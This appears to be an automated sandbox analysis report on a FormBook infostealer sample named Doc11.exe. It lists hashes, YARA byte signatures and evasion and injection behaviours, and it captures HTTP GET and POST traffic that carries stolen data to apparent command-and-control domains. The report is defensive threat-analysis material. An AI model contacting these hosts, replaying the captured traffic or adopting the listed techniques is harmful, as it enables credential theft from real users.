Play interactive tourEdit tour

# Analysis Report Doc11.exe

## Overview

### General Information

 Sample Name: Doc11.exe Analysis ID: 288546 MD5: f7ad3b59548788a59172b6477a1b83f0 SHA1: 3b042b49ac135f38824de3665a051a7631e98782 SHA256: f22a0b5b12687ae12b9f4d625d82a16562bce5e1b03b7d7372df3813e5afc8e5 Tags: FormBook Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Antivirus / Scanner detection for submitted sample
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64Doc11.exe (PID: 4936 cmdline: 'C:\Users\user\Desktop\Doc11.exe' MD5: F7AD3B59548788A59172B6477A1B83F0)RegAsm.exe (PID: 5836 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)RegAsm.exe (PID: 5948 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)cscript.exe (PID: 4464 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)cmd.exe (PID: 5952 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98d8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b42:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa55a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb253:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b267:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c26a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18349:\$sqlite3step: 68 34 1C 7B E1
• 0x1845c:\$sqlite3step: 68 34 1C 7B E1
• 0x18378:\$sqlite3text: 68 38 2A 90 C5
• 0x1849d:\$sqlite3text: 68 38 2A 90 C5
• 0x1838b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x184b3:\$sqlite3blob: 68 53 D8 7F 8C
00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0xc4a8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0xc712:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x18245:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x17d31:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x18347:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x184bf:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xd12a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x16fac:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xde23:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1de37:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1ee3a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 28 entries
SourceRuleDescriptionAuthorStrings
2.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
2.2.RegAsm.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98d8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b42:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa55a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb253:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b267:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c26a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.RegAsm.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18349:\$sqlite3step: 68 34 1C 7B E1
• 0x1845c:\$sqlite3step: 68 34 1C 7B E1
• 0x18378:\$sqlite3text: 68 38 2A 90 C5
• 0x1849d:\$sqlite3text: 68 38 2A 90 C5
• 0x1838b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x184b3:\$sqlite3blob: 68 53 D8 7F 8C
2.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
2.2.RegAsm.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x8ad8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8d42:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14875:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14361:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14977:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x14aef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x975a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x135dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa453:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1a467:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1b46a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 7 entries

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

 Antivirus / Scanner detection for submitted sample Show sources
 Source: Doc11.exe Avira: detected
 Multi AV Scanner detection for submitted file Show sources
 Source: Doc11.exe Virustotal: Detection: 34% Perma Link Source: Doc11.exe ReversingLabs: Detection: 25%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE
 Machine Learning detection for sample Show sources
 Source: Doc11.exe Joe Sandbox ML: detected
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 2.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 0.2.Doc11.exe.6320000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then pop edi Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop edi
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /dfc/?D8P=3+M06F3PIg4yWAePafKrbwLCVt/5XonsK6D9R8t918UDHllTjs2fMYDw+G4H15oZP3Dg&qL0=gjqP-lQha6A HTTP/1.1Host: www.chelsescompass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /dfc/?D8P=9M3+mrw2yCLpvsjtVt4xmWYaRC63IF9WI6ouro4nLgjTYgR16zyhTX9CTsO+/cCnLtWf&qL0=gjqP-lQha6A HTTP/1.1Host: www.snacklabbet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: LOOPIASE LOOPIASE Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /dfc/ HTTP/1.1Host: www.snacklabbet.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.snacklabbet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.snacklabbet.com/dfc/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 44 38 50 3d 31 75 37 45 34 50 42 42 39 56 61 63 36 2d 48 6c 56 36 31 62 6e 54 5a 67 56 78 57 57 59 6c 68 66 63 74 68 32 77 49 38 63 47 53 28 31 49 6b 5a 77 77 52 50 31 54 53 4d 45 52 64 43 35 74 35 36 52 57 59 66 64 67 6a 65 30 6c 73 78 76 34 55 31 6e 44 2d 63 4b 43 44 52 46 55 31 47 34 65 52 4f 43 4d 43 31 6b 4a 76 45 4f 53 4a 43 39 4f 75 38 51 7a 62 45 33 32 70 4b 32 6d 34 48 77 63 57 4e 4f 65 49 7a 75 48 39 69 6b 73 74 4f 72 78 4f 59 74 76 5a 72 38 34 50 70 49 78 74 72 55 6b 7a 65 72 53 64 57 4d 34 49 56 65 48 64 33 73 4b 65 65 4e 51 53 61 77 68 79 50 70 38 75 75 71 7e 49 49 78 38 35 4e 5f 53 6e 37 52 52 4b 67 56 28 6f 7e 38 49 4e 70 41 50 41 4b 62 6b 51 55 33 4f 37 43 42 46 77 4d 57 74 43 63 70 53 39 6e 44 47 5a 32 6f 33 72 41 6c 34 78 4a 30 55 35 6f 7a 49 76 31 59 5a 45 7e 61 63 5f 56 5a 67 34 61 5f 56 72 54 35 62 61 72 69 6f 37 7e 73 47 58 48 78 70 41 57 6c 59 4e 41 74 34 7a 67 5f 45 6f 61 61 35 4e 72 2d 6e 74 38 68 4f 6a 62 6f 42 78 6e 30 55 41 46 46 59 52 73 55 51 6e 44 61 4e 55 32 4b 4d 4e 43 71 5a 36 64 54 45 36 66 6a 58 6c 64 4a 74 33 33 48 47 48 50 49 64 55 53 41 62 51 52 6d 75 74 51 71 46 53 33 6b 58 6b 73 36 57 66 30 51 55 39 57 76 28 41 28 44 4f 57 51 6e 6f 5f 53 6e 6e 76 30 38 79 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: D8P=1u7E4PBB9Vac6-HlV61bnTZgVxWWYlhfcth2wI8cGS(1IkZwwRP1TSMERdC5t56RWYfdgje0lsxv4U1nD-cKCDRFU1G4eROCMC1kJvEOSJC9Ou8QzbE32pK2m4HwcWNOeIzuH9ikstOrxOYtvZr84PpIxtrUkzerSdWM4IVeHd3sKeeNQSawhyPp8uuq~IIx85N_Sn7RRKgV(o~8INpAPAKbkQU3O7CBFwMWtCcpS9nDGZ2o3rAl4xJ0U5ozIv1YZE~ac_VZg4a_VrT5bario7~sGXHxpAWlYNAt4zg_Eoaa5Nr-nt8hOjboBxn0UAFFYRsUQnDaNU2KMNCqZ6dTE6fjXldJt33HGHPIdUSAbQRmutQqFS3kXks6Wf0QU9Wv(A(DOWQno_Snnv08yw). Source: global traffic HTTP traffic detected: POST /dfc/ HTTP/1.1Host: www.snacklabbet.comConnection: closeContent-Length: 185341Cache-Control: no-cacheOrigin: http://www.snacklabbet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.snacklabbet.com/dfc/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 44 38 50 3d 31 75 37 45 34 4c 38 34 75 46 58 45 77 73 6a 6d 48 36 6c 54 32 43 6f 2d 52 7a 53 46 4a 33 42 74 56 61 78 6d 77 4a 73 59 4b 7a 76 6a 66 30 4a 77 32 53 6e 75 55 79 4d 48 41 4e 43 6d 36 4a 7e 74 4b 34 48 56 67 6d 6e 54 6c 73 70 73 68 43 59 74 43 75 64 54 44 6a 74 58 57 31 53 64 65 54 36 33 4d 6b 74 4b 66 66 41 4f 66 5a 4b 5f 43 76 73 4c 36 5f 55 47 6f 4b 75 33 6b 39 54 70 66 6d 67 35 63 71 50 32 50 66 47 71 39 75 53 65 76 66 6f 42 6c 6f 7a 33 32 5f 74 4c 74 65 57 51 38 30 4f 6e 54 65 4f 36 37 4e 35 64 4b 4e 76 69 4e 63 48 6e 56 6d 69 4a 6e 68 57 59 38 76 33 53 6c 70 30 64 75 4c 70 4e 51 53 54 6f 44 59 51 58 37 62 48 68 4d 4c 55 32 66 77 61 30 38 68 6b 73 59 34 47 55 41 31 49 47 6e 44 55 34 55 4d 72 78 53 62 75 63 30 34 74 6f 33 56 4e 62 41 71 4a 7a 47 65 55 62 4e 6e 54 35 52 5f 55 51 69 34 61 72 65 49 61 4f 63 72 76 39 76 36 50 4d 46 51 6a 63 73 41 79 41 56 72 41 70 32 79 6f 69 42 59 57 57 32 65 44 73 6a 50 77 71 49 51 48 75 66 42 6e 6e 55 43 74 61 59 52 73 32 51 69 28 67 4e 6c 53 4b 4e 59 4f 44 61 62 64 50 43 36 65 68 52 30 74 48 6d 6c 6a 75 47 48 58 49 50 55 44 49 5a 6e 74 6d 6b 66 49 72 46 32 62 6b 62 30 73 36 5a 5f 31 53 59 6f 6d 71 7a 43 4b 4d 45 6b 68 67 38 71 50 71 6c 2d 64 6d 6c 44 54 76 6c 73 48 7a 6b 37 44 73 6c 4b 35 65 64 6f 6a 4d 53 39 4e 73 5a 53 76 67 78 6f 51 38 7a 5a 65 77 68 39 74 34 76 4b 58 46 31 4d 76 74 6c 6b 35 36 28 4b 41 35 36 70 61 55 54 37 32 4b 44 6c 50 47 41 42 79 31 62 39 30 56 38 73 6e 6e 65 39 7e 6e 36 66 28 41 75 58 28 4f 57 69 68 5f 4d 37 66 73 47 6b 7a 4d 4a 6c 73 74 77 4c 6d 5a 66 49 61 67 4c 71 6c 4b 62 4c 7e 4b 63 48 6a 69 62 75 51 4f 4e 55 74 37 30 36 6f 41 45 73 4e 51 34 69 48 53 30 2d 62 51 28 37 56 44 62 42 35 4d 4a 4e 6d 78 70 58 47 48 55 66 6b 65 4a 75 67 62 51 46 58 49 7a 30 51 4d 6e 63 49 31 52 75 69 59 76 36 65 76 6f 70 54 35 51 52 52 30 48 2d 44 43 50 42 67 65 62 34 30 7a 62 79 50 4f 37 47 78 75 4d 43 48 69 41 35 4c 53 39 37 43 72 30 67 4d 42 7a 55 4e 71 67 31 4e 42 52 53 48 62 7e 68 28 56 63 68 7e 2d 76 37 30 36 7e 39 68 65 6c 48 6b 62 61 77 7e 65 6e 33 6f 2d 57 5a 63 4a 73 47 63 72 4b 48 67 67 68 55 74 44 33 35 47 53 7e 5f 4e 53 54 65 68 5a 72 51 68 7a 32 4f 38 30 68 61 57 37 69 62 53 71 52 43 61 51 64 69 55 64 76 71 5a 4a 6a 78 4e 4c 76 6a 47 4d 4f 36 71 4a 47 70 63 4a 52 63 69 77 30 6f 30 77 46 6c 52 6b 43 38 36 5f 67 4f 65 32 68 57 76 57 79 34 4b 4e 54 72 4d 56 6c 5a 36 6f 41 78 7e 6f 5a 66 34 58 6b 39 38 58 62 73 45 6e 47 67 4b 47 55 4d 65 5a 50 46 63 4d 38 5f 53 70 78 49 42 6f 31 6d 56 6b 66 61 68 79 36 4f 58 30 68 6a 30 68 38 41 77 31 64 43 4b 36 6c 6f 54 67 4f 4e 51 64 7e 64 6b 7
 Source: global traffic HTTP traffic detected: GET /dfc/?D8P=3+M06F3PIg4yWAePafKrbwLCVt/5XonsK6D9R8t918UDHllTjs2fMYDw+G4H15oZP3Dg&qL0=gjqP-lQha6A HTTP/1.1Host: www.chelsescompass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /dfc/?D8P=9M3+mrw2yCLpvsjtVt4xmWYaRC63IF9WI6ouro4nLgjTYgR16zyhTX9CTsO+/cCnLtWf&qL0=gjqP-lQha6A HTTP/1.1Host: www.snacklabbet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.chelsescompass.com
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /dfc/ HTTP/1.1Host: www.snacklabbet.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.snacklabbet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.snacklabbet.com/dfc/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 44 38 50 3d 31 75 37 45 34 50 42 42 39 56 61 63 36 2d 48 6c 56 36 31 62 6e 54 5a 67 56 78 57 57 59 6c 68 66 63 74 68 32 77 49 38 63 47 53 28 31 49 6b 5a 77 77 52 50 31 54 53 4d 45 52 64 43 35 74 35 36 52 57 59 66 64 67 6a 65 30 6c 73 78 76 34 55 31 6e 44 2d 63 4b 43 44 52 46 55 31 47 34 65 52 4f 43 4d 43 31 6b 4a 76 45 4f 53 4a 43 39 4f 75 38 51 7a 62 45 33 32 70 4b 32 6d 34 48 77 63 57 4e 4f 65 49 7a 75 48 39 69 6b 73 74 4f 72 78 4f 59 74 76 5a 72 38 34 50 70 49 78 74 72 55 6b 7a 65 72 53 64 57 4d 34 49 56 65 48 64 33 73 4b 65 65 4e 51 53 61 77 68 79 50 70 38 75 75 71 7e 49 49 78 38 35 4e 5f 53 6e 37 52 52 4b 67 56 28 6f 7e 38 49 4e 70 41 50 41 4b 62 6b 51 55 33 4f 37 43 42 46 77 4d 57 74 43 63 70 53 39 6e 44 47 5a 32 6f 33 72 41 6c 34 78 4a 30 55 35 6f 7a 49 76 31 59 5a 45 7e 61 63 5f 56 5a 67 34 61 5f 56 72 54 35 62 61 72 69 6f 37 7e 73 47 58 48 78 70 41 57 6c 59 4e 41 74 34 7a 67 5f 45 6f 61 61 35 4e 72 2d 6e 74 38 68 4f 6a 62 6f 42 78 6e 30 55 41 46 46 59 52 73 55 51 6e 44 61 4e 55 32 4b 4d 4e 43 71 5a 36 64 54 45 36 66 6a 58 6c 64 4a 74 33 33 48 47 48 50 49 64 55 53 41 62 51 52 6d 75 74 51 71 46 53 33 6b 58 6b 73 36 57 66 30 51 55 39 57 76 28 41 28 44 4f 57 51 6e 6f 5f 53 6e 6e 76 30 38 79 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: D8P=1u7E4PBB9Vac6-HlV61bnTZgVxWWYlhfcth2wI8cGS(1IkZwwRP1TSMERdC5t56RWYfdgje0lsxv4U1nD-cKCDRFU1G4eROCMC1kJvEOSJC9Ou8QzbE32pK2m4HwcWNOeIzuH9ikstOrxOYtvZr84PpIxtrUkzerSdWM4IVeHd3sKeeNQSawhyPp8uuq~IIx85N_Sn7RRKgV(o~8INpAPAKbkQU3O7CBFwMWtCcpS9nDGZ2o3rAl4xJ0U5ozIv1YZE~ac_VZg4a_VrT5bario7~sGXHxpAWlYNAt4zg_Eoaa5Nr-nt8hOjboBxn0UAFFYRsUQnDaNU2KMNCqZ6dTE6fjXldJt33HGHPIdUSAbQRmutQqFS3kXks6Wf0QU9Wv(A(DOWQno_Snnv08yw).
 Urls found in memory or binary data Show sources

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
